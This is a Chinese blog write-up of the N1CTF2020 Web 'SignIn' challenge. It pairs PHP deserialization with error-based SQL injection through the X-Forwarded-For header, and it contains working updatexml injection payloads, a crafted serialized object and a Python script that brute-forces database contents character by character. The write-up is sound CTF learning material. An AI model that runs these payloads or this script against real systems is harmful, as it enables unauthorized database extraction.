N1CTF2020 Web SignIn-wp

最新推荐文章于 2023-10-27 22:21:21 发布
最新推荐文章于 2023-10-27 22:21:21 发布
阅读量1k 收藏
点赞数 3
分类专栏: ctf php序列化 文章标签: ctf php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46091464/article/details/109180810
版权

报名了N1CTF 结果没有做 有点后悔 最后才看wp跟着做一次 还有谢谢atao师傅提供的脚本。
看来自己也要学习一下怎么写简单的脚本啦。

一. 源代码

<?php 
class ip {
    public $ip;
    public function waf($info){//设置waf
    }
    public function __construct() {
        if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
            $this->ip = $this->waf($_SERVER['HTTP_X_FORWARDED_FOR']);//参数可以控制
        }else{
            $this->ip =$_SERVER["REMOTE_ADDR"];
        }
    }
    public function __toString(){//当一个对象被当作一个字符串被调用。
        $con=mysqli_connect("localhost","root","********","n1ctf_websign");
        $sqlquery=sprintf("INSERT into n1ip(`ip`,`time`) VALUES ('%s','%s')",$this->waf($_SERVER['HTTP_X_FORWARDED_FOR']),time());
        if(!mysqli_query($con,$sqlquery)){
            return mysqli_error($con);
        }else{
            return "your ip looks ok!";
        }
        mysqli_close($con);
    }
}
class flag {
    public $ip;
    public $check;
    public function __construct($ip) {
        $this->ip = $ip;
    }
    public function getflag(){
    	if(md5($this->check)===md5("key****************")){
    		readfile('/flag');
    	}
        return $this->ip;
    }
    public function __wakeup(){//反序列化会执行__wakeup魔法函数利用点
        if(stristr($this->ip, "n1ctf")!==False)
            $this->ip = "welcome to n1ctf2020";
        else
            $this->ip = "noip";
    }
    public function __destruct() {
        echo $this->getflag();
    }

}
if(isset($_GET['input'])){
    $input = $_GET['input'];
	unserialize($input);//进行反序列化利用点
}

上面简单的分析了一下源代码,思路就是进行控制X-Forwarded-For参数进行sql注入到key,然后进行获得flag

二. 分析代码

我们可以看到输入的input进行反序列化操作这样就会调用__wakeup()魔法函数,又因为__wakeup()魔法函数里面stristr()函数,这个函数是忽略大小写字符串的查询。

但是我们要利用的是ip类的__toString()方法进行sql注入。所以如果我们将stristr()函数里面的ip参数换成ip类,这样就会调用ip类的__toString()方法从而执行sql注入

$a = new flag(new ip());
echo $a;
#O:4:"flag":2:{s:2:"ip";O:2:"ip":1:{s:2:"ip";N;}s:5:"check";N;}

如果我们注入到key就成功可以成功获得flag
接下来就是进行sql注入啦

三. sql注入原理分析

这里进行sql注入原理分析需要结合ip类和flag类一起看

#ip类的__toString方法
    public function __toString(){
        $con=mysqli_connect("localhost","root","********","n1ctf_websign");
        $sqlquery=sprintf("INSERT into n1ip(`ip`,`time`) VALUES ('%s','%s')",$this->waf($_SERVER['HTTP_X_FORWARDED_FOR']),time());
        if(!mysqli_query($con,$sqlquery)){//错误就返回错误信息
            return mysqli_error($con);
        }else{//正确就返回"your ip looks ok!"
            return "your ip looks ok!";
        }
        mysqli_close($con);
    }

#flag类的__wakeup()方法
    public function __wakeup(){
        if(stristr($this->ip, "n1ctf")!==False)//寻找字符串"n1ctf"存在
            $this->ip = "welcome to n1ctf2020";
        else
            $this->ip = "noip";
    }
#存在就返回"welcome to n1ctf2020",不存在就返回"noip"

在flag类里面的stristr($this->ip, "n1ctf")中的$this->ip的值是进行SQL语句执行后的返回值,意思就是如果ip类的sql语句执行成功就返回"your ip looks ok!"然后不存在"n1ctf"字符串,最后返回页面的就是noip。如果sql语句执行失败就会返回失败信息,如果信息里面有"n1ctf"就会页面输出welcome to n1ctf2020

通过上面分析,发现正常是插入sql语句是不行的,如果要利用就必须让sql语句执行不成功。而且可以进行判断0或1。所以我们就可以使用报错注入。
在这里插入图片描述

#sql payload
select  updatexml(1,concat('~',(select if((1=1),'n1ctf',0)),'~'),1);

#exp
' or updatexml(1,concat('~',(select if((1=1),'n1ctf',0)),'~'),1) or '

这样我们就可以进行报错注入啦,最后就是闭合单引号。

在这里插入图片描述

四. Payload

#思路
数据库:n1ctf_websign

获得表
'or updatexml(1,concat('~',(select if((substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='n'),'n1ctf',0)),'~'),1) or '
#n1ip,n1key

获得字段
'or updatexml(1,concat('~',(select if((substring((select group_concat(column_name) from information_schema.columns where table_name='n1key'),1,1)='i'),'n1ctf',0)),'~'),1) or '
#ip,key

获得key值
'or updatexml(1,concat('~',(select if((substring((select `key` from n1key),1,1)='n'),'n1ctf',0)),'~'),1) or '
#n1ctf20205bf75ab0a30dfc0c

#最后payload
?input=O:4:"flag":2:{s:2:"ip";O:2:"ip":1:{s:2:"ip";N;}s:5:"check";s:25:"n1ctf20205bf75ab0a30dfc0c";}

#  -*- coding: utf-8 -*-
# @Author: atao
import requests

url = 'http://101.32.205.189/?input=O:4:"flag":1:{s:2:"ip";O:2:"ip":0:{}}'
dic = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789-+{}="
flag=''

for j in range(1, 20):
    #for m in dic:
    for m in range(48,126):
        headers = {
            'X-Forwarded-For': "'or updatexml(1,concat('~',(select if((substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}'),'n1ctf',0)),'~'),1) or '".format(j,chr(m))
            #'X-Forwarded-For': "'or updatexml(1,concat('~',(select if((substring((select group_concat(column_name) from information_schema.columns where table_name='n1key'),{},1)='{}'),'n1ctf',0)),'~'),1) or '".format(j, m)
            #'X-Forwarded-For': "'or updatexml(1,concat('~',(select if((substring((select `key` from n1key),{},1)='{}'),'n1ctf',0)),'~'),1) or '".format(j,m)

        }
        res = requests.get(url=url, headers=headers)
        #res = requests.get(url=url, headers=headers)
        #print res.text
        if "<code>welcome to n1ctf2020</code>" in res.text:
            flag = flag + chr(m)
            break
    print flag

五. 总结

学习了新姿势序列化配合sql注入
还有就是脚本学习hhh~

希望对您有帮助~

Firebasky
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
N1CTF Junior 2024 Web Official Writeup(Nu1L Team组织的官方纳新赛事,旨在选拔优秀人才加入Nu1L Team
04-08 900
小北觉得这一次的N1 Junior的题大部分都有个共同性,就是二次思维,也就是单次Attack无法达到利用,那就double attack!!!自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
CTF-All-In-One 20171015
10-15
CTF-All-In-One 20171015 CTF-All-In-One 20171015 一本 CTF 领域的大杂烩指南
N1Script:N1脚本
05-09
N1Script 开源服务端和客户端源码 更新记录: 2019.12.16 v2.10 1.添加倒计时功能 2019.12.14 v2.9 1.添加服务器设置历史记录 2.添加github主页跳转按钮 2019.12.13 v2.8 (需更新服务端及手机端) 1.修改定时为单控模式 2019.12.6 v2.6(需更新服务端及手机端) 1.添加周期执行功能 2.优化数据请求成功率,修改数据请求为http协议,原tcp连接只做推送(完成部分) 现在需要使用3个端口,8000连接dc1,8800连接手机,8880作为http请求端口 2019.9.23 v2.3(需更新服务端及手机端) 1.添加星期定时功能 2.添加验证token 3.修复android 9升级异常 2019.9.3 1.添加定时功能 2019.8.26 1.添加在线升级 2019.8.22 1.添加本地数据库保存,默认路径为
青少年CTF-web-signin
m0_63047884的博客
12-17 666
qsnctf-web-easy-signin,pathinfo漏洞上传绕过
ctfshow愚人杯-web-wp
qq_46570234的博客
04-03 1522
4月1日-4月2日愚人杯部分webWP,包括侥幸过的非预期解的“被遗忘的反序列化”
【BUUCTF】N1BOOK WEB WP
aoao331198的博客
03-29 2221
文章目录常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2 常见的搜集 粗心的小李 git泄露,用scrabble工具得到一个网页打开即可 SQL注入-1 SQL注入-2 afr_1 afr_2
N1CTF2022 WEB题3道java WP(OldFasjson那题待更新)
m0_61206225的博客
11-08 1083
N1CTF2022 WEB题3道java WP(OldFasjson那题待更新)
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础篇;二、工具篇;三、分类专题篇;四、技巧篇;五、高级篇;六、题解篇;七、实战篇... 2000多页的电子书,讲解细致,值得搜藏。
ctf-all-in-one.pdf
05-25
CTF-All-In-One(CTF 从入门到放弃) ——“与其相信谣言,不如一直学习。”ctf基础加入门题
CTF-5#进击!拿到Web最高权限-WP
10-23
CTF/Web安全/ WP最高权限获取 CTF(Capture The Flag)是一种信息安全竞赛形式,目的是为了让参与者通过解决各种挑战和谜题来获取 Flags,证明自己的信息安全能力。WP(Web)是CTF中的一种挑战形式,旨在让参与者...
ctfweb攻防工具-御剑1.5.7z
04-06
【御剑】是一款知名的Web安全扫描工具,常用于CTF(Capture The Flag)竞赛和网络安全检测。CTF是一种信息安全竞赛,参与者通过展示攻击与防御技术来争夺“旗标”,即获取或保护特定的信息资源。在这样的竞赛中,Web...
N1CTF 2023 pwn_n1array
最新发布
qq_62172019的博客
10-27 198
N1CTF2023 pwn_n1array
ctfWEB练习二
渗透测试研究中心
12-15 8581
题目名称:从0到1CTFer成长之路-Web文件上传题目wirteup:启动题目场景,获得题目靶场,访问网站,发现是一个文件上传漏洞,并且源代码也显示出来。http://eci-2zead4wngyl8hacgmm4n.cloudeci1.ichunqiu.com/ 源代码大概如下分析:<?phpheader("Content-Type:text/html; charset=utf-8")...
n1ctf2020-web-signin
veinard_F的博客
10-20 682
水平不够,复现困难,先做个简单的记录,,, 题目源码: class ip { public $ip; public function waf($info){ } public function __construct() { if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $this->ip = $this->waf($_SERVER['HTTP_X_FORWARDED_FOR'])
N1CTF2019——warmup WP
qq_41252520的博客
10-12 739
前言 国内实力战队出的题目质量都非常高,我不敢想象这就是pwn的签到题。首先说一下这道题如何质量高。这道题涉及到了double free、UAF、tcache attack、IO_FILE的利用。赛后复现用去了我差不多3天的时间来钻研。 保护 分析 程序只有增加、删除、编辑三个操作,并且保护全开,这种情况下只能利用IO_FILE来泄露内存。增加操作中已经限制了分配的大小: 漏洞有些隐蔽,...
N1CTF2019——babypwn WP
qq_41252520的博客
10-13 561
保护 我的测试环境为ubuntu16.04.1 分析 添加操作中限制只能添加10个结构体: 结构体为: struct Staff{ char Name[0x10]; char *Description; int Description_Size; }; 漏洞存在删除操作中: 总的二进制程序逆向分析到这,下面来考虑怎么利用。 利用 这道题和warmup那道题有点相似,但...
WUST-CTF2020-WP
夏日 の blog
03-29 5285
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
2020西湖论剑CTF部分MISC——Write Up
热门推荐
晚安這個未知的世界
10-14 1万+
谢谢盖师傅,本文章参考盖师傅的WP再详细的解释每一步的解题步骤,盖师傅yyds Yusapapa 题目地址:http://yusa-papa.7bf48c.challenge.gcsis.cn/ 查看题目所给网站的源码,其中有一段注释 1. Maybe these texts are really helpful for you 2. Biometric list is OK! 3. endow gremlin indulge bison flatfoot fallout goldfish bis
水一篇HSC-1th大赛 wp HSCCTF2022
mumuzi的博客
02-21 2380
水一个简单的
ctf工具之binwalk--windows下(misc).rar
07-30
对于CTF比赛来说,binwalk可以帮助我们进行文件的分析和提取,从而更好地理解题目并解决问题。 在Windows下使用binwalk,我们首先需要在官方网站(https://github.com/ReFirmLabs/binwalk)下载并安装binwalk的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值